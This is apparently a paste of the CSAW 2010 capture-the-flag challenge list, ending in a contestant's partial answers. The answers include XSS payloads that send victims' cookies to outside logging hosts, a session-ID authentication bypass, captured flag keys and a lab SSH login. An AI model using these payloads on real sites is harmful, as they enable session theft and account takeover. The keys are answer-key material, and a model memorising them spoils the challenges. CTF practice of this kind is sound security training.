csaw 2k10

Posted by a guest, Aug 13th, 2011
CRYPTO

Challenges by Marcin Wielgoszewski.

http://128.238.66.100:30008/challenge1  [300 points]
http://128.238.66.100:30008/challenge2  [400 points]
http://128.238.66.100:30008/challenge3  [500 points]

There is an extra challenge.  [250 points]

----

WEB BUGS

XSS

There are five XSS challenges.  Every 15 minutes, the persistent databases are wiped, so load your payloads quickly.  ;)
The keys are cookies on a client box.

XSS1  [100 points]
http://128.238.66.100:30003/xss1/in.php
http://128.238.66.100:30003/xss1/out.php

XSS2  [200 points]
http://128.238.66.100:30003/xss2/in.php
http://128.238.66.100:30003/xss2/out.php

XSS3  [300 points]
http://128.238.66.100:30003/xss3/in.php
http://128.238.66.100:30003/xss3/out.php

XSS4  [400 points]
http://128.238.66.100:30003/xss4/in.php
http://128.238.66.100:30003/xss4/out.php

XSS5  [500 points]
http://128.238.66.100:30003/xss5/in.php
http://128.238.66.100:30003/xss5/out.php


SQLI

There are three SQLI challenges.  Authenticate to get the key.

SQLI1  [100 points]
http://128.238.66.100:30004/sql1/auth.php

SQLI2  [200 points]
http://128.238.66.100:30004/sql2/auth.phps
http://128.238.66.100:30004/sql2/reg.php
http://128.238.66.100:30004/sql2/auth.php

SQLI3  [300 points]
Key is in @KEY
http://128.238.66.100:30004/sql3/auth.php


A programmer was tasked with making a secure website.  He reasoned that if everyone was always authenticated, there would be no way for an attacker to authenticate maliciously.  Break it.  [200 points]
http://128.238.66.100:30005/chal1/chal.php


There's something different about this page, isn't there?  [300 points]
http://128.238.66.100:30006/chal1/chal.php


??  [400 points]
http://128.238.66.100:30007/chal1/chal.phps
http://128.238.66.100:30007/chal1/chal.php

----
EXPLOIT

Exploitation1  [100 points]
http://128.238.66.100:30009/exploitation/1
128.238.66.100:40001
128.238.66.100:40002
128.238.66.100:40003

Exploitation2  [200 points]
No need to scan it.
http://128.238.66.100:30009/exploitation/2.c
128.238.66.100:40005

Exploitation3  [300 points]
Get root.  Get the key.  If only I can jump over the mountain without being normal.
ssh://128.238.66.100:40010
chal3:$+1zX*(
2048 51:41:94:32:cf:b1:3f:d9:74:c1:d2:08:aa:e3:49:2b /etc/ssh/ssh_host_rsa_key.pub (RSA)
1024 22:7f:72:93:93:7e:9a:3d:01:b9:58:ea:74:1a:c5:af /etc/ssh/ssh_host_dsa_key.pub (DSA)


Web Browser Exploitation by Dino Dai Zovi

"Operation Eos"

HyperGlobalMega Inc., a global leader in widget, gadget, and sprocket manufacturing, is quite concerned with the protection of their proprietary information.  As part of their desktop security initiative, they have based their Windows XP desktop build on the NIST Federal Desktop Core Configuration.  The FDCC is based on the Air Force customization of the Specialized Security-Limited Functionality (SSLF) recommendations in NIST SP 800-68 and DoD customization of the recommendations in Microsoft's Security Guide for Internet Explorer 7.0.  HyperGlobalMega has augmented that configuration baseline by keeping their workstations fully up to date with Microsoft patches and using the latest and most secure version of Internet Explorer (IE 8 with Permanent DEP on XP SP3).  However, due to backwards compatibility requirements with a number of internally-developed web applications, their desktop image includes legacy standalone versions of older Internet Explorer browsers.  HyperGlobalMega users are trained to only use these older browsers for certain intranet web applications.

A HyperGlobalMega systems administrator has inadvertently left their workstation golden image readable on a publicly accessible web server, allowing potential attackers to develop and test their attacks against HyperGlobalMega's desktop configuration:

https://trailofbits.s3.amazonaws.com/HyperGlobalMegaCorp_GoldenImage.zip?torrent

Clues:

- A little bit of reconnaissance found this employee that spends too much time on Twitter: http://twitter.com/clickaddictvic.
- HyperGlobalMega's desktops run XP SP3 with IE6 (no DEP), IE7 (DEP), and IE8 (Permanent DEP).
- It's hard to know which browser will be used at what time.
- HGM installs a custom ActiveX component on their desktops and recon has found this sample web page that uses it: http://trailofbits.s3.amazonaws.com/index.html

Points:

- IE6: [200 points]
- IE7: [300 points]
- IE8: [500 points]

- Bonus points are added for writing exploits against the "Medium" or "Hard" vulnerabilities.  To be awarded these points, you must email your Vulnerable.js file with your exploit fully contained in it to ddz@theta44.org (after you use it against the target VM, obviously).  If the exploit is good, you will be awarded 200 bonus points for exploiting the Medium and 500 bonus points for the Hard vulnerabilities against any version of IE.  You can submit "bonus" exploits for each target version of IE.
- No bonus points are awarded for a given version of IE if one of the vulnerabilities is not successfully exploited against the live VM and your team has not retrieved the secret token for that version of IE.
---
FORENSICS

Challenges by Efstratios Gavas

What is the street address?  [100 points]
http://128.238.66.100:30009/forensics/1.jpg

Hash me.  [200 points]
http://128.238.66.100:30009/forensics/2.tar

What Am I Drinking?  [300 points]
http://128.238.66.100:30009/forensics/3.jpg

Rick Astley is inside me.  [200 points and 200 points]
http://128.238.66.100:30009/forensics/4.tc

---
RECON

For this category, you will be doing reconnaissance on the CSAW CTF judges.  http://www.poly.edu/csaw-CTF/judges

Each CSAW CTF judge was given a key to hide in a place that a clever attacker might look when doing research on that judge.

The constraints are:
        The key must be public.
        The location of the key must be somehow tied to the judge.

[100 points each]
----
REVERSING

Challenges by Jon Chittenden

Reversing1  [100 points]
http://128.238.66.100:30009/reversing/j/1.txt
http://128.238.66.100:30009/reversing/j/1

Reversing2  [200 points] [BROKEN]
http://128.238.66.100:30009/reversing/j/2.txt
http://128.238.66.100:30009/reversing/j/2

Reversing3  [300 points]
http://128.238.66.100:30009/reversing/j/3.txt
http://128.238.66.100:30009/reversing/j/3
http://128.238.66.100:30009/reversing/j/images/desktop.png
http://128.238.66.100:30009/reversing/j/images/hurrdurr.jpg
http://128.238.66.100:30009/reversing/j/images/keanu.jpg
http://128.238.66.100:30009/reversing/j/images/son.gif
http://128.238.66.100:30009/reversing/j/images/sponge.jpg


Challenges by Alex Sotirov

Reversing1  [500 points]
You're looking for the magical incantation that will cause the program to display the secret KEY.
http://128.238.66.100:30009/reversing/a/KFJSCGEH.EXE


Challenges by Erik Cabetas

Which door is the backdoor?  [100 points]
When you find which one it is, the "key" to this challenge will be the command to invoke the backdoor.
http://128.238.66.100:30009/reversing/e/1.tar

Give me all the power in the world  [200 points]
http://128.238.66.100:30009/reversing/e/2

genesis 1:1  [300 points]
http://128.238.66.100:30009/reversing/e/3
----
TRIVIA

Answers should be submitted like regular keys.

Names should be formatted like this:  [Prefix.] [I.] [I.] First [M.] [Last]  Examples:  Cpt. James T. Kirk, H. D. Moore, spender
Memory addresses should be represented in hex, prefixed with 0x.  Example:  0xDEADBAB1E5
Domains should be submitted without any generic aliases.  For example, www.google.com should be google.com and mail.code.google.com should be code.google.com.
Any questions should be directed to #trivia on the IRC server.
Don't drop answers in the IRC channel; if you think you have the answer to a question but aren't getting the points for it, PM an operator.


Questions by Erik Cabetas

What were the three most popular sites that hosted mirrors of defaced websites and acted as a sort of "score board" for hacking groups?  [15 points each] 1,2,3

The author who published the FIRST public paper/tutorial on PHP web app vulnerabilities also co-authored a tool meant for protecting exploits, so that even if a sysadmin on a compromised system found the exploit binary, they couldn't run it without a password.
Who reverse engineered the aforementioned tool and spoke at the Black Hat conference in Washington DC regarding his work?  [50 points] 4


Questions by Jon Oberheide

What security group released the infamous Apache Scalp chunked-encoding remote exploit targeting OpenBSD in the early 2000s?  [25 points] 5

Under what pseudonym did a security researcher lead the Month of Kernel Bugs (MoKB) and Month of Apple Bugs (MoAB)?  [25 points] 6

Who is the only person to win a Pwnie award two years in a row in the same category?  [25 points] 7

What's wrong with the following call to setuid when used in the context of a privileged executable attempting to drop privileges?  [100 points] 8
        /* assume uid 65534 is some non-privileged user (eg. nobody) */
        setuid(65534);
        /* perform an operation that isn't safe in a privileged context */
        fp = fopen("/tmp/oh_i_sure_hope_this_isnt_a_symlink", "w");
        fwrite(attacker_controlled_data, 1, attacker_controlled_len, fp);
        fclose(fp);

If you have the ability to write arbitrary data to a file, what file would you most likely write in order to gain root privileges?  [100 points] 9

What's fishy about the following /etc/passwd file?  [25 points] 10,11
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
        bin:x:2:2:bin:/bin:/bin/sh
        sys:x:3:3:sys:/dev:/bin/sh
        sync:x:4:65534:sync:/bin:/bin/sync
        games:x:5:60:games:/usr/games:/bin/sh
        man:x:6:12:man:/var/cache/man:/bin/sh
        lp:x:7:7:lp:/var/spool/lpd:/bin/sh
        mail:x:8:8:mail:/var/mail:/bin/sh
        news:x:9:9:news:/var/spool/news:/bin/sh
        uucp:x:0:0:uucp:/var/spool/uucp:/bin/sh
        proxy:x:13:13:proxy:/bin:/bin/sh
        www-data:x:33:33:www-data:/var/www:/bin/sh
        list:x:38:38:Mailing List Manager:/var/list:/bin/sh
        nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
        syslog:x:101:102::/home/syslog:/bin/false
        messagebus:x:102:106::/var/run/dbus:/bin/false
        gdm:x:112:119:Gnome Display Manager:/var/lib/gdm:/bin/false
        jono:x:1000:1000:Jon Oberheide,,,:/home/jono:/bin/bash
        sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
        rtkit:x:117:126:RealtimeKit,,,:/proc:/bin/false


Questions by Brandon Edwards

What type of vulnerability is shown here?  [50 points] 12
       strncpy(tempbuf, userinput, sizeof(tempbuf));

How large will the allocated block be in bytes (assuming memory is available)?  [50 points] 13
       uint32 datasize = 75101;
       uint32 usersize = 57191;
       uint32 totalsize = 0;
       void *pointer = NULL;
       totalsize = datasize * usersize;
       pointer = malloc(totalsize);
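Added example, not part of the original paste: the arithmetic behind the question above, written in C with the standard uint32_t in place of the quiz's uint32.  The product is computed in 32 bits and so is reduced modulo 2^32 before it ever reaches malloc; the checked version does the multiply in 64 bits and refuses the allocation when the true size does not fit.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* The size exactly as the quiz snippet computes it: both operands are
 * 32-bit unsigned, so the product wraps modulo 2^32 and malloc receives
 * a much smaller number than the caller believes it asked for. */
uint32_t wrapped_size(uint32_t datasize, uint32_t usersize)
{
    return datasize * usersize;
}

/* Checked multiply: returns 1 and stores the product in *out when it fits
 * in 32 bits, returns 0 (and leaves *out untouched) when it would wrap.
 * The 64-bit intermediate makes the comparison exact. */
int checked_size(uint32_t datasize, uint32_t usersize, uint32_t *out)
{
    uint64_t wide = (uint64_t)datasize * (uint64_t)usersize;
    if (wide > UINT32_MAX)
        return 0;
    *out = (uint32_t)wide;
    return 1;
}

/* Allocation guarded by the check: NULL on overflow or on malloc failure,
 * so a wrapped size can never produce an undersized buffer. */
void *safe_alloc(uint32_t datasize, uint32_t usersize)
{
    uint32_t total;
    if (!checked_size(datasize, usersize, &total))
        return NULL;
    return malloc(total);
}

int main(void)
{
    /* the quiz's constants */
    uint32_t datasize = 75101, usersize = 57191, total;

    printf("wrapped:  %u bytes\n", wrapped_size(datasize, usersize));
    if (checked_size(datasize, usersize, &total))
        printf("checked:  %u bytes\n", total);
    else
        printf("checked:  product exceeds UINT32_MAX, allocation refused\n");
    return 0;
}
```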

On x86, the opcode byte 0x41 executes which instruction?  [25 points] 14


Questions by Dan Guido

This hot social web startup has been banned by the FTC from making any statements touting their security for the next 20 years.  [25 points] 15

This cryptographic attack can decrypt web session tokens just like in the movies.  [25 points] 16

This security snake oil salesman has been the target of many attacks, including XSS, so far this year.  [25 points] 17


Questions by Marcin Wielgoszewski

I was a director of the NSA before becoming director of the CIA.  Who am I?  [25 points] 18

The cipher I used to communicate with my generals was named after me.  Who am I?  [25 points] 19

What port does Ping work over?  [25 points] 20

This operation took place in 1990 and was one of [if not the] largest and most publicized crackdowns on illegal hacking ever.  [25 points] 21


Questions by Dean De Beer

The function 'arguments.callee.toString()' is often seen in malicious JavaScript.  What is it usually used to do in malicious JavaScript?  [50 points] 23

What are five of the methods used by the recently discovered Stuxnet bot to propagate?  [15 points each] 24,25,26,27,28


Bonus Question by the New York City Hacking Scene

What new term for "elite hacker" was coined at this year's SummerCon because of the abuse of the term "hacker" by makers and arts and crafts enthusiasts?  [100 points] 22
---

Some answers:
http://128.238.66.100:30007/chal1/chal.php?p[]=
Correct password! 41b8a02eea3ecabe3ec93be49155be19be60625c

====
Trivia 4
http://www.blackhat.com/html/bh-federal-03/bh-federal-03-speakers.html#Eagle
R: Chris Eagle
=====
Trivia 2,3
http://www.iwar.org.uk/directory/hacking/defacement-archives.htm
R:
2. attrition.org
3. zone-h.org
=====
Trivia 5
http://downloads.securityfocus.com/vulnerabilities/exploits/apache-scalp.c
R: GOBBLES
=====
XSS 1
<script>document.location="http://null-labs/log.php?c="+document.cookie;</script>
key=this_is_the_first_xss_key
=====
XSS 2
Disable JS
<script>document.location="http://null-labs/log.php?c="+document.cookie;</script>
key=now_youre_getting_good_at_this
=====
Session 200
SESSIONID=-1
http://128.238.66.100:30005/chal1/chal.php
key: 922163d93317d5d8eaa142c872233015
======
Trivia 15
R: Twitter
======
XSS 3
null-labs" style="background-color:white;width:9000px;height:13000px;margin-top:-3000px;margin-left:-100px;z-index:2147483647;position:absolute;" onunload="location.replace('http://null/log.php?c='+escape(document.cookie));" onselect="location.replace('http://null/log.php?c='+escape(document.cookie));" onfocus="location.replace('http://null/log.php?c='+escape(document.cookie));" onmousemove="location.replace('http://null/log.php?c='+escape(document.cookie));
????????
key=that_is_what_am_talking_about
======
Trivia 18
R: Michael Hayden
======
Trivia 19
R: Julius Caesar
======
Trivia 21
Operation Sundevil
======